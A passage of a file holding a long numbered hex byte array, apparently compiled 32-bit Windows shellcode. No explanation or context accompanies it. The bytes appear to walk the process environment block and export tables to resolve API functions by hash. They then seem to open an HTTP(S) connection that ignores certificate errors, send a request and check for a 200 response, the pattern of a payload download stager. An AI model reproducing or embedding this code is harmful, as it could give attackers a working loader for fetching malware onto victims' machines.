257 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0x10, 0x89,
258 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc8, 0x89, 0x04, 0x24, 0xe8, 0x6a, 0x49,
259 0x00, 0x00, 0x85, 0xc0, 0x75, 0x2c, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff,
260 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7,
261 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
262 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
263 0x45, 0xf4, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x29,
264 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x90, 0xeb, 0x21, 0x8b, 0x45, 0xd8, 0x8b,
265 0x50, 0x10, 0x8b, 0x45, 0x14, 0x29, 0xd0, 0x8d, 0x14, 0x85, 0x00, 0x00,
266 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c,
267 0x01, 0xd0, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xd8, 0x0f,
268 0x82, 0x06, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x50, 0x04, 0x8b,
269 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xf4, 0x0f, 0x83, 0xf2, 0x00, 0x00,
270 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00,
271 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0,
272 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88,
273 0x02, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
274 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b,
275 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83,
276 0x7d, 0xec, 0x3b, 0x76, 0xc3, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xec, 0x83,
277 0xc0, 0x01, 0xc6, 0x44, 0x05, 0x84, 0x64, 0x8b, 0x45, 0xec, 0x83, 0xc0,
278 0x02, 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x03,
279 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x04, 0xc6,
280 0x44, 0x05, 0x84, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x01, 0x45,
281 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55,
282 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x44,
283 0xff, 0xff, 0xff, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45,
284 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6,
285 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3e, 0x76, 0xcf, 0x8d,
286 0x95, 0x44, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0xc6, 0x00,
287 0x00, 0x8d, 0x85, 0x44, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d,
288 0x45, 0x84, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
289 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xdb, 0xfc, 0xff, 0xff,
290 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81,
291 0xec, 0x98, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
292 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x19, 0x8b, 0x55, 0x0c,
293 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b,
294 0x55, 0xec, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55,
295 0x0c, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
296 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xd2, 0x8d, 0x55, 0x84, 0x8b, 0x45,
297 0xec, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xe8, 0x04,
298 0x0f, 0xb6, 0x44, 0x05, 0x84, 0x3c, 0x2e, 0x74, 0x46, 0x8b, 0x45, 0xec,
299 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x2e, 0x8b,
300 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84,
301 0x64, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0xc6, 0x44,
302 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec,
303 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89,
304 0x55, 0xec, 0xc6, 0x44, 0x05, 0x84, 0x00, 0xc7, 0x45, 0xc8, 0x18, 0x00,
305 0x00, 0x00, 0x8b, 0x45, 0xc8, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xc4, 0x8b,
306 0x45, 0xc4, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b,
307 0x40, 0x0c, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x0c, 0x89,
308 0x45, 0xf4, 0xeb, 0x6e, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x89, 0x45,
309 0xe0, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xdc, 0x8b, 0x40,
310 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b,
311 0x45, 0xd8, 0x8b, 0x40, 0x78, 0x89, 0x45, 0xd4, 0x83, 0x7d, 0xd4, 0x00,
312 0x74, 0x37, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x89, 0x45,
313 0xd0, 0x8b, 0x45, 0xd0, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0xe0, 0x01, 0xd0,
314 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x89, 0x44, 0x24, 0x04, 0x8d, 0x45,
315 0x84, 0x89, 0x04, 0x24, 0xe8, 0x0f, 0x47, 0x00, 0x00, 0x85, 0xc0, 0x74,
316 0x09, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45,
317 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18,
318 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x82, 0x83, 0x7d,
319 0xf0, 0x00, 0x75, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x8d, 0x55,
320 0x84, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf0,
321 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x81, 0xec,
322 0x40, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x89, 0x85, 0xe0, 0xfd, 0xff,
323 0xff, 0x8b, 0x45, 0x14, 0x89, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x8b, 0x45,
324 0x18, 0x89, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x1c, 0x89, 0x85,
325 0xdc, 0xfd, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b,
326 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x3c, 0x89,
327 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4,
328 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89,
329 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
330 0x00, 0xe9, 0xb6, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x8b, 0x45, 0xdc,
331 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89,
332 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
333 0x00, 0xe9, 0x92, 0x02, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x1c,
334 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8b,
335 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45,
336 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xcc,
337 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x0c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
338 0x45, 0xc8, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x21, 0x8b,
339 0x55, 0xc8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8,
340 0x20, 0x89, 0xc2, 0x8d, 0x8d, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4,
341 0x01, 0xc8, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xc8, 0x8b,
342 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xd0, 0x8d,
343 0x95, 0xb4, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00,
344 0x00, 0x8b, 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff,
345 0xff, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x85, 0xb4,
346 0xfe, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xd7, 0x4b, 0x00, 0x00, 0x89,
347 0x45, 0xc0, 0x89, 0x55, 0xc4, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff,
348 0x3f, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01,
349 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xbc, 0x8b,
350 0x85, 0xd8, 0xfd, 0xff, 0xff, 0x8b, 0x95, 0xdc, 0xfd, 0xff, 0xff, 0x89,
351 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x45, 0xbc, 0x89, 0x04,
352 0x24, 0xe8, 0x94, 0x4b, 0x00, 0x00, 0x89, 0xc1, 0x33, 0x4d, 0xc0, 0x89,
353 0xce, 0x89, 0xd0, 0x33, 0x45, 0xc4, 0x89, 0xc7, 0x89, 0xf0, 0x33, 0x85,
354 0xe0, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd0, 0xfd, 0xff, 0xff, 0x89, 0xf8,
355 0x33, 0x85, 0xe4, 0xfd, 0xff, 0xff, 0x89, 0x85, 0xd4, 0xfd, 0xff, 0xff,
356 0x8b, 0x95, 0xd0, 0xfd, 0xff, 0xff, 0x8b, 0x8d, 0xd4, 0xfd, 0xff, 0xff,
357 0x89, 0xc8, 0x09, 0xd0, 0x85, 0xc0, 0x0f, 0x85, 0x55, 0x01, 0x00, 0x00,
358 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b,
359 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14,
360 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10,
361 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x3b,
362 0x45, 0xd8, 0x0f, 0x82, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b,
363 0x50, 0x04, 0x8b, 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xec, 0x0f, 0x83,
364 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xb8, 0xc7, 0x45,
365 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2b, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
366 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff, 0xff,
367 0x8b, 0x55, 0xf4, 0x01, 0xca, 0x88, 0x02, 0x8b, 0x55, 0xb8, 0x8b, 0x45,
368 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45,
369 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
370 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83, 0x7d, 0xf4, 0x3b, 0x76, 0xc0, 0xeb,
371 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0xc6, 0x84, 0x05, 0x74,
372 0xfe, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x02, 0xc6, 0x84,
373 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x03,
374 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xf4, 0x83,
375 0xc0, 0x04, 0xc6, 0x84, 0x05, 0x74, 0xfe, 0xff, 0xff, 0x00, 0x8b, 0x45,
376 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45, 0xb8, 0xc7, 0x45, 0xf4, 0x00, 0x00,
377 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xb8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
378 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0xf4, 0xfd, 0xff, 0xff, 0x8b, 0x55, 0xf4,
379 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xb8, 0x8b,
380 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83,
381 0x7d, 0xf4, 0x7e, 0x76, 0xcf, 0x8d, 0x95, 0xf4, 0xfd, 0xff, 0xff, 0x8b,
382 0x45, 0xf4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfd, 0xff,
383 0xff, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x85, 0x74, 0xfe, 0xff, 0xff, 0x89,
384 0x44, 0x24, 0x08, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
385 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5e, 0xf8, 0xff, 0xff, 0x89, 0x45, 0xec,
386 0x8b, 0x45, 0xec, 0xeb, 0x17, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0,
387 0x00, 0x74, 0x0a, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x18, 0xfe, 0xff,
388 0xff, 0x8b, 0x45, 0xec, 0x81, 0xc4, 0x40, 0x02, 0x00, 0x00, 0x5e, 0x5f,
389 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x0c, 0x89,
390 0x45, 0xd0, 0x8b, 0x45, 0x10, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x14, 0x89,
391 0x45, 0xc8, 0x8b, 0x45, 0x18, 0x89, 0x45, 0xcc, 0xc7, 0x45, 0xf0, 0x00,
392 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45,
393 0xe4, 0x64, 0x8b, 0x00, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x40,
394 0x30, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45,
395 0xe8, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x3c,
396 0x8b, 0x45, 0xf4, 0x8b, 0x48, 0x18, 0x8b, 0x45, 0xc8, 0x8b, 0x55, 0xcc,
397 0x89, 0x44, 0x24, 0x10, 0x89, 0x54, 0x24, 0x14, 0x8b, 0x45, 0xd0, 0x8b,
398 0x55, 0xd4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x0c, 0x89, 0x4c,
399 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x50, 0xfc, 0xff,
400 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45, 0xf4,
401 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83, 0x7d,
402 0xf0, 0x00, 0x74, 0xb4, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
403 0x57, 0x56, 0x53, 0x81, 0xec, 0x5c, 0x03, 0x00, 0x00, 0xc7, 0x45, 0xe4,
404 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00, 0xc7,
405 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
406 0x00, 0xc7, 0x45, 0xd4, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
407 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89,
408 0x45, 0xd0, 0xc7, 0x45, 0xdc, 0x00, 0x03, 0x60, 0x04, 0xc7, 0x44, 0x24,
409 0x08, 0x3c, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
410 0x00, 0x8d, 0x85, 0x54, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xfd,
411 0x40, 0x00, 0x00, 0xc7, 0x85, 0x54, 0xff, 0xff, 0xff, 0x3c, 0x00, 0x00,
412 0x00, 0x8d, 0x85, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x85, 0x64, 0xff, 0xff,
413 0xff, 0xc7, 0x85, 0x68, 0xff, 0xff, 0xff, 0x04, 0x01, 0x00, 0x00, 0x8d,
414 0x85, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x45, 0x80, 0xc7, 0x45, 0x84, 0x04,
415 0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0xfd, 0xff, 0xff, 0x89, 0x85, 0x70,
416 0xff, 0xff, 0xff, 0xc7, 0x85, 0x74, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00,
417 0x00, 0x8d, 0x85, 0xcc, 0xfc, 0xff, 0xff, 0x89, 0x85, 0x78, 0xff, 0xff,
418 0xff, 0xc7, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x40, 0x00, 0x00, 0x00, 0x8b,
419 0x45, 0x08, 0x8b, 0x80, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
420 0x8a, 0xf8, 0x08, 0x00, 0x00, 0x8d, 0x95, 0x54, 0xff, 0xff, 0xff, 0x89,
421 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x10, 0xc7,
422 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0,
423 0x83, 0xec, 0x10, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
424 0xe9, 0x58, 0x06, 0x00, 0x00, 0x8b, 0x85, 0x60, 0xff, 0xff, 0xff, 0x83,
425 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xd8, 0x83,
426 0x7d, 0xd8, 0x00, 0x74, 0x14, 0x81, 0x4d, 0xdc, 0x00, 0x00, 0x80, 0x00,
427 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x07, 0x81, 0x4d, 0xdc, 0x00, 0x30, 0x00,
428 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xac, 0x00, 0x00, 0x00, 0xc7, 0x44,
429 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00,
430 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
431 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00,
432 0x00, 0xff, 0xd0, 0x83, 0xec, 0x14, 0x89, 0x45, 0xcc, 0x83, 0x7d, 0xcc,
433 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe4, 0x05, 0x00,
434 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x0f, 0xb7,
435 0x95, 0x6c, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0xd2, 0xc7, 0x44, 0x24, 0x1c,
436 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
437 0xc7, 0x44, 0x24, 0x14, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10,
438 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00,
439 0x89, 0x54, 0x24, 0x08, 0x8d, 0x95, 0x50, 0xfe, 0xff, 0xff, 0x89, 0x54,
440 0x24, 0x04, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
441 0x20, 0x89, 0x45, 0xc8, 0x83, 0x7d, 0xc8, 0x00, 0x0f, 0x84, 0xb6, 0x04,
442 0x00, 0x00, 0x8b, 0x45, 0x84, 0x85, 0xc0, 0x75, 0x0e, 0xc6, 0x85, 0x4c,
443 0xfd, 0xff, 0xff, 0x2f, 0xc6, 0x85, 0x4d, 0xfd, 0xff, 0xff, 0x00, 0x8b,
444 0x45, 0x08, 0x8b, 0x80, 0xc4, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
445 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x89, 0x54, 0x24, 0x18, 0xc7,
446 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
447 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
448 0x95, 0x4c, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
449 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8, 0x89, 0x14, 0x24, 0xff,
450 0xd0, 0x83, 0xec, 0x20, 0x89, 0x45, 0xc4, 0x83, 0x7d, 0xc4, 0x00, 0x0f,
451 0x84, 0x33, 0x04, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x45, 0x8b,
452 0x45, 0xdc, 0x25, 0x00, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x39, 0xc7,
453 0x45, 0xc0, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x9c, 0x80, 0x33, 0x00,
454 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4, 0x00, 0x00, 0x00, 0xc7, 0x44,
455 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x9c, 0x89, 0x54, 0x24,
456 0x08, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4,
457 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x8b, 0x85, 0x74, 0xff,
458 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb4,
459 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x70,
460 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7,
461 0x44, 0x24, 0x04, 0x1c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14,
462 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x85, 0x7c,
463 0xff, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x33, 0x8b, 0x45, 0x08, 0x8b, 0x80,
464 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95,
465 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x0c, 0x89, 0x54, 0x24, 0x08,
466 0xc7, 0x44, 0x24, 0x04, 0x1d, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89,
467 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xe0, 0x8b, 0x45,
468 0x08, 0x8b, 0x80, 0xc8, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
469 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
470 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
471 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
472 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0x47, 0x02, 0x00, 0x00, 0xc7, 0x45,
473 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x90, 0x00, 0x00, 0x00, 0x00,
474 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
475 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54, 0x24, 0x0c,
476 0x8d, 0x55, 0x90, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x13,
477 0x00, 0x00, 0x20, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
478 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x84, 0xff, 0x01, 0x00, 0x00, 0x8b, 0x45,
479 0x90, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xf1, 0x01, 0x00, 0x00,
480 0xc7, 0x45, 0x94, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00,
481 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xcc, 0x00, 0x00, 0x00, 0xc7,
482 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x55, 0x94, 0x89, 0x54,
